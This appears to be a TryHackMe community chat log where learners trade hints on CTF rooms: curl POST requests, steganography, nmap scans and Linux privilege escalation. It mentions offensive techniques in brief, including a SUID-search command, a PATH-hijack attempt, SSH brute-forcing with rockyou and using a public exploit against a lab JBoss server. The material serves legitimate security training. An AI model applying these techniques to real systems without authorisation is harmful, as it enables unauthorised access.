Im guessing the important function is get_password, but what the instructions are doing, even decompiled I can't understand it. I'll calm down and go through it line by line tomorrow on paper or something. 🙂

Yeah the radare room is just a debugger and tool to analyze asm

If you don't know asm you're gonna have some trouble with the crackme

YEES I got it ! I feel so stupid.

Your advice was all it took. Silly me

Thanks!

😁

I'm gonna sleep sound 😄

Good night

Thanks, you too!

TryHackMe is da best combination with HTB.

Hey, Im doing the web fundamentals room and Im doing the mini ctf. It tells me to do a post request "POST request. /ctf/post" so Im trying to do "curl -X POST --data 'ctf/post ' 'http://10.10.98.48:8081/'". I've tried may combinations like that. Any Hints?

Im not too familiar with cURL

Try sending it to /ctf/post

Rather than sending it as a parameter

can someone help me with ctfcollection>task21? the pcap one

I've done that before "curl -X POST --data ' ' 'http://10.10.98.48:8081/ctf/post'" but was greeted with this message and didn't know if it was intended "You need the right request body"

@true slate Check the task then 🙂 -- it'll be telling you to send something specific

@inland onyx Thank you for showing me how big of an idiot I am. I guess I skipped over it, thanks for your help you saved me a massive headache

I remember having difficulty with that too, until I re-read it.

That's usually my problem is I know how to do something I just jump the gun and try without reading everything

hi guys I will glad to get a little hint for Juice shop forget password for Jim.
I've tried to look for any injection possibilites on the form but coudn't find it.
Ive already logon as admin and as Jim and tried to find any details on the profile pages and all the network requests. any idea or direction please?

@stuck fractal got it. Ghidra interpreted the hex to ASCII incorrectly and I stupidly believed it. Thanks for commenting and making me try again though.

I ended up installing Ghidra in my commando VM because I needed to anyway, and for some reason highlighting the hex values in the listing on Kali only showed 'z' whereas the Windows version showed 'za'

@keen tinsel from memory I think this challenge is OSINT. The challenge is finding his forgotten password question right?

@white salmon
Yes the challenge is to find his answer to his question for Jim

I found it by the way, it was very tricky

||it's about finding the person in real life||

oh nice 👌

Evening, guys. How can I find the request's sent data (of a dns data Exfiltration) using wireshark?

(I already found the specific request that leaked the data)

@dusky cosmos There's something real suspicious about the request it made

what is the software version on port22? and as answer i need to use x.x.xxx

it's literally right there

Deleting because answer

any hint for task 4 at the new room of Tony The Tiger?
I have no idea where to look for the flag

@calm prism what have you tried?

you can dm me...

guys the port 8080 of JBOSS server has been closed in Tony the Tiger

Till yesterday it was open

hence i m not able to use the exploit

pls help

@late lark Are you sure?

oh now it is showing open

why is this so?

@late lark it takes a minute for the machine to load...that might have been the issue..

oh i see

where i will find the flag? i have the shell

@late lark you can dm me.

hey guys, i am trying to solve https://tryhackme.com/room/rpnmap

but i am stuck at problem4 task 3

nmap ||-sV or -A|| don't show the service number for this smh

similar problem with problem 5 in the same section

@frosty osprey it works for me with an ||-sV|| (started this room just to check your question)

id suggest redeploying the vm

Hey @peak girder thanks for checking it up, but its not working even after i restarted

heres the command-

||sudo nmap -sV -p 22 <IP>||

another thing, when I do a normal scan, ports 22 and 80 are open, but when i specify these ports, their States show up as filtered

yeah, your command works for me... what kind of output are you getting?

PORT STATE SERVICE VERSION
22/tcp filtered ssh

theres nothing below version

thats... kind of strange

could it be a problem with the nmap version? its 7.8 on mine.

yeah I was just thinking that

but I'm also on 7.8

or no

I'm on 7.80

try and update?

yeah, ill try that, thanks

(ill bet you.. it's gonna work after 😉 )

well @frosty osprey I did the room now as well.. hadn't done it yet, hehe.. Thanks for that 🙂

hey guys, anyone completed tony the tiger? i am stuck and i need some hints

@eager flax what's up?

Hello @inland onyx

i am really new here so i am doing my best to go the extra mile

where's the first flag?? hahahaha

i've checked source codes, exif of images, burped and got another image, looked every spot i could think of... 😦

i'm also trying to "rockyou" the ssh but no luck so far..

Good start, and you're looking in the right place. But there's more to steganography than exif

i have no idea on stega

You don't need to go as far as using something like steghide

i'll look on it

But there might still be something hidden in those images 🙂

ok thx bud i'll google on resources for steganography

Thanks for googling 😄

@inland onyx just by luck and good will....... you're becoming my mentor

😄

In that case @eager flax you might want to think about paying @inland onyx 😉

I will also take a handlers fee

hahahahaha

ok guys get in line

let me find my checkbook please 😄

I don't want any of this 'you'll get your fiver in the post' either...

Oof. Paid, wouldn't that be nice... 😂

Nah, we're all volunteers here 😁

Woah, speak for yourself.

jokes

anybody got a hint for wgel ctf? 🙂

@pseudo ermine where are you at with it?

enumeration for an hour now haha

doing it with a friend but both of us haven't really found anythihg

except the person who should update the server

so tried to bruteforce ssh with her name

but that would've been bit to easy i guess :p

btw did nikto scan, nmap, nessus and dirbuster

Been ages since I did that one

the fact that OPTIONS is allowed drawed my attention a bit

From memory it's got something to do with hidden directories on the website

haha it looked a good challenge style 🙂

Double down on the dirbuster

okay 😄 we'll try more there than

😁

I'm going to go redo that one and write it up I think

yeah there are write-ups

but than i'll see to much info probs :p

so don't want to look at it yet haha

but if you redo it now by any chance tips would be welcome hehe

@inland onyx my friend took a peek. You rembered right 😜

@inland onyx regarding year of the rabbit. I looked at the other rooms you created with priviledge escalation. I also looked up on the ||/usr/lib/pt_chown|| that i suspect can be exploited. So i found something on exploit-db and i tried it. From what i said does this sound like the correct road?

Definitely not the intended way

Worth trying though 🤷‍♂️

@inland onyx Can you give me a hint towards the intended way? I tried the ||sudo & the buffer overflow escalation||. Did not work. I also tried other things were the one i mentioned before was one of them.

Struggeling to understand ||find / -type f -user root -perm -4000 -exec ls -ldb {} ; 2>>/dev/null|| which is what i see many people use for this

I do however understand its output

Yeah the find command won't get you anywhere here either, although I would recommend https://tryhackme.com/room/thefindcommand for that one

You're on the right lines with the first one, but it ain't BOF

So you´re telling me to look into the "the find command" ?

the room

Nah, that's a side thing. It won't help with YOTR

@inland onyx So it is a|| /usr/bin/sudo ||thing i gottta find

Potentially... 😁

hy guys

still having trouble with getting a flag

can someone help me pls ?

I'm having a major brainfart on the (excellent) commonlinuxprivesc room [Task 9] Exploiting PATH Variable question number 4. The rest of the room is finished and I can't seem to get this right. My best failed attempt was ||echo ./bin/bash > ls|| Can anyone help me so I can have some closure 🙂

@white salmon It may help others if you mention which topic, task and question you are on?

But there might still be something hidden in those images 🙂
@inland onyx 👀

Darkfighter hi again 🙂

same issue with the flag with curl -x post 🙂

still no success

@white salmon The thing tells you if you're doing it wrong

Break down the command into the parts

What URL? What data? What verb?

hi, i am trying the small CTF in Web Fundamentals

I know.

i have to get the POST flag from http://x.x.x.x /ctf/post

ii am doing curl -X POST http://x.x.x.x /ctf/post

Ok, you need to look at the man page for curl

i tried --data but i dont know what to add

And how URLs are formed

okay...

And how to specify data

And read the question again

It tells you exactly what the server needs in order to give you the flag, you just have to format the command

i will try

thank you very much

@inland onyx got root 😄

Ey!

user to root was easier than getting initial foothold imo :p

That's often true

Most creators make one of 'em harder

but had a lot of fun 🙂

I wish i could say the same about root 🙂 haha

@stuck fractal "you need the right request body" ?

Sounds like you have the wrong request body

does that mean the <> format ?

Huh?

Angle brackets having nothing to do with HTTP

right, thats HTML

@white salmon So, what's the question?

it seems i am missing some information, i already got the other flags. just want to know what am i doing wrong...

If it's saying you have the wrong request body, that means you have the wrong request body

So however you're specifying it, it's not quite right

👍

Or what you're specifying isn't what you've been told to use

i used --data ''. i used --data 'thm{}' .seems like i am on the right path, i just need to ask what i need from the ctf

i will dig deeper

thank you again, i will finally get it

@white salmon

...

Hello. Room rpnessus. Task 4 / Question 7. I've done the scan. But no vulnerabilities found, only info 😦

@white salmon Data is what you send to the server.

Why would you send it the flag that you don't have?

@inland onyx oh my god this is so embarasing :)) thank you very much, i overlooked the obvious :))

@stuck fractal thanks man, i didnt read the whole sentence above and i rushed to the answer without reading properly

You should always read

Will prevent issues

many thanks again guys.

Hi guys! I'm playing the Advent - Day 1, for some reason my modified cookie doesn't work, any pointers?

Make sure there's no 7 in your decoded cookie

That was it indeed

The room also accepted my answer including a 7

for the fixed part

The rooms have answer tolerance

I see

Thanks for your help, moving on to day 2 🙂

@lyric pollen In future, cyberchef

Some of the online converters are bad and add 7s

echo "" | base64 -d might be better for the future, was just reading up on it

Cyberchef gui

good

echo "" | base64 -d might be better for the future, was just reading up on it
@lyric pollen That'll throw an error too

Or rather

It will when you reconvert

When you're converting back, use echo -n "" | base64

Hey guys. Having trouble with room rpnessus, Task 4 in général. It says to configure a network scan. That's what I do but when i scan, i have no vulnerabilties. I see there is a plugin tab when configuring the scan. Do I have to manually select which plugin it must use ?

got my answer. Plugins are readonly when doing basic network scan. So .. Why dont I have vulnerabilities in the report? 😦

@inland onyx i got that flag from Tony the Tiger, i was trying harder that i should. I used stegoveritas and got a huge wall

Hello guys and gals

has anyone tried inoculation?

I got the user flag weeks ago and I didn't take notes

got my answer. Plugins are readonly when doing basic network scan. So .. Why dont I have vulnerabilities in the report? 😦
@white salmon cries

Seems like the burpsuite room https://tryhackme.com/room/learnburp is missing some tasks.

Does everyone only have 3 tasks?

3d task also stops in the middle of something.

So, I'm doing rpnessus. I found a write up on it, and I definitely dont have the same result after the basic network scan (in which you cant really turn on/off options .. so difficult to mess up)

And about the web server version, when checking dev console, there's an Apache 2.4.7 .. but that's not the right answer ^^

same thing with php version .. version from dev console is not right

@white salmon The php one seems to be reliably slightly off

if there's an L, change it to a 1